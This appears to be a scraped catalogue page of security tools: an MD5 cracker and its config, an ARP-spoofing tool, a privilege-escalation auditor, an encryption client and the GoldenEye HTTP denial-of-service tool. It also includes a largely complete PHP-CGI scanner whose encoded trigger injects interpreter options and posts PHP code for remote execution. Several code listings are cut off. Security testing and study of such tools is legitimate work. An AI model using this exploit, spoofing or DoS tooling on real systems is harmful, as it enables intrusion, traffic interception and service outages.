Mac OS

Apple Mac OS X

Cortana Scripts by Mudge

Overview:
Cortana is a scripting language for Armitage and Cobalt Strike. This is a collection of Cortana scripts that can be used with Cobalt Strike and Armitage.

fang

Fang is a multi service threaded MD5 cracker

fang.conf
POST|http://www.onlinehashcrack.com/free-hash-reverse.php[hashToSearch:{HASH},searchHash:Search]|Plain text \: ]*>([^<]+)
POST|http://www.md5decryption.com/[hash:{HASH},submit:Decrypt+It%21]|>Decrypted Text: <\/b>(.+)<\/font>
GET|http://md5.gromweb.com/?md5={HASH}|name="string" value="(.+)" id="form_string" maxlength="255" size="40" />
GET|http://www.stringfunction.com/md5-decrypter.html?st={HASH}|(.+)
GET|http://md5.noisette.ch/md5.php?hash={HASH}|
POST|http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php[md5:{HASH},x:23,y:8]|Hashed string: (.+)\s*
POST|http://md5pass.info/[hash:{HASH},get_pass:Get+Pass]|Password - (.+)\s*

#!/usr/bin/python
# This file is part of Fang.
#
# Copyright(c) 2010-2011 Simone Margaritelli
# [email protected]
# <a href="http://www.evilsocket.net<br />
#<br />
#" title="http://www.evilsocket.net<br />
#<br />
#">http://www.evilsocket.net<br />
#<br />
#</a> This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to <a href="http://www.gnu.org/licenses/gpl.html<br />
#" title="http://www.gnu.org/licenses/gpl.html<br />
#">http://www.gnu.org/licenses/gpl.html<br />
#</a> or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

import getopt, sys, os, urllib, urllib2, re, urlparse, os, threading, signal
from optparse import OptionParser, OptionGroup

class Service(threading.Thread):
def __init__ ( self, type, url, regex, exit_on_match, hash ):
threading.Thread.__init__(self)

self.type = type
self.url = url

Climber

Climber is an automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

Dependencies
python >= 2.7
python-crypto
python-mako
python-paramiko

Note
Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.

https://github.com/knipknap/exscript

This module is already included in Climber sources.

NetCommander

NetCommander 1.3 - An easy to use arp spoofing tool.
Copyleft Simone Margaritelli
http://www.evilsocket.net
http://www.backbox.org

Usage: netcmd.py [options]

Options:
  -h, --help            show this help message and exit
  -I IFACE, --iface=IFACE
                        Network interface to use if different from the default
                        one.
  -N NETWORK, --network=NETWORK
                        Network to work on.
  -G GATEWAY, --gateway=GATEWAY
                        Gateway to use.
  -K, --kill            Kill targets connections instead of forwarding them.
  -D DELAY, --delay=DELAY
                        Delay in seconds between one arp packet and another,
                        default is 5.
  -A, --all             Keep spoofing and spoof all connected and later
                        connected interfaces.

pyCryptocat

pyCryptocat - A Cryptocat standalone python client

Authors and contributors
Simone Margaritelli (evilsocket)
Raffaele Forte

Cryptocat is free software that aims to provide an open, accessible Instant Messaging environment that encrypts your conversations and works right in your browser.
pyCryptocat is a Cryptocat standalone chat client written in Python, using python-webkit package to serve Cryptocat JS and HTML files.
Cryptocat provides multi-user (and private) instant messaging inside chatrooms. It uses the OTR protocol for encrypted two-party chat and the (upcoming) mpOTR protocol for encrypted multi-party chat.
The goal is to provide the easiest, most accessible way to chat while maintaining your privacy online.

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

Authored by infodox

#!/usr/bin/python2
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
    try:
        haxor = requests.post(url, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:

Nsdtool Netgear Switch Scanner

Nsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.

CodeCrypt

The post-quantum cryptography tool.
This is a GnuPG-like unix program for encryption and signing that uses only quantum-computer-resistant algorithms:
McEliece cryptosystem (compact quasi-dyadic variant) for encryption
Hash-based Merkle tree algorithm (FMTSeq variant) for digital signatures

Why this?
Go read http://pqcrypto.org/

Links
infopage: http://e-x-a.org/codecrypt/
package downloads: http://e-x-a.org/codecrypt/files/

Documentation
There is a complete, UNIXy manual page supplied with the package. You can view it online here: http://e-x-a.org/codecrypt/ccr.1.html

Quick How-To
Everything is meant to work mostly like GnuPG, but with some good simplicity margin. Let's play with random data!

ccr -g help
ccr -g fmtseq128-sha --name "John Doe"    # your signature key
ccr -g mceqd128 --name "John Doe"     # your encryption key

ccr -K  #watch the generated keys
ccr -k

ccr -p -a -o my_pubkeys.asc -F Doe  # export your pubkeys for friends

#see what people sent us
ccr -ina < friends_pubkeys.asc

#import Frank's key and rename it
ccr -ia -R friends_pubkeys.asc --name "Friendly Frank"

#send a nice message to Frank (you can also specify him by @12345 keyid)
ccr -se -r Frank < Document.doc > Message_to_frank.ccr

#receive a reply
ccr -dv -o Decrypted_verified_reply.doc <Reply_from_frank.ccr

#rename other's keys
ccr -m Frank -N "Unfriendly Frank"

#and delete pukeys of everyone who's Unfriendly
ccr -x Unfri

#create hashfile from a large file
ccr -sS hashfile.ccr < big_data.iso

#verify the hashfile
ccr -vS hashfile.ccr < the_same_big_data.iso


Option reference
For completeness I add listing of all options here (also available from ccr --help)
Usage: ./ccr [options]

Common options:
 -h, --help     display this help
 -V, --version  display version information
 -T, --test     perform (probably nonexistent) testing/debugging stuff

Global options:

c1zc0-ban

Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.

GoldenEye

GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye is an HTTP/S Layer 7 denial of service testing tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets on the HTTP/S server.

Changes: Referer strings from search engines now only domain part hardcoded. Referer generation function now generates even more random referers. Evades Juniper Netscreen signature. Various other updates and improvements.

OLD:
Usage
USAGE: ./goldeneye.py [OPTIONS]
OPTIONS:
Flag Description Default
-t, --threads Number of concurrent threads (default: 500)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

NEW:
USAGE: ./goldeneye.py [OPTIONS]

OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

Utilities
util/getuas.py - Fetchs user-agent lists from http://www.useragentstring.com/pages/useragentstring.php subpages (ex: ./getuas.py http://www.useragentstring.com/pages/Browserlist/) REQUIRES BEAUTIFULSOUP4

Syndicate content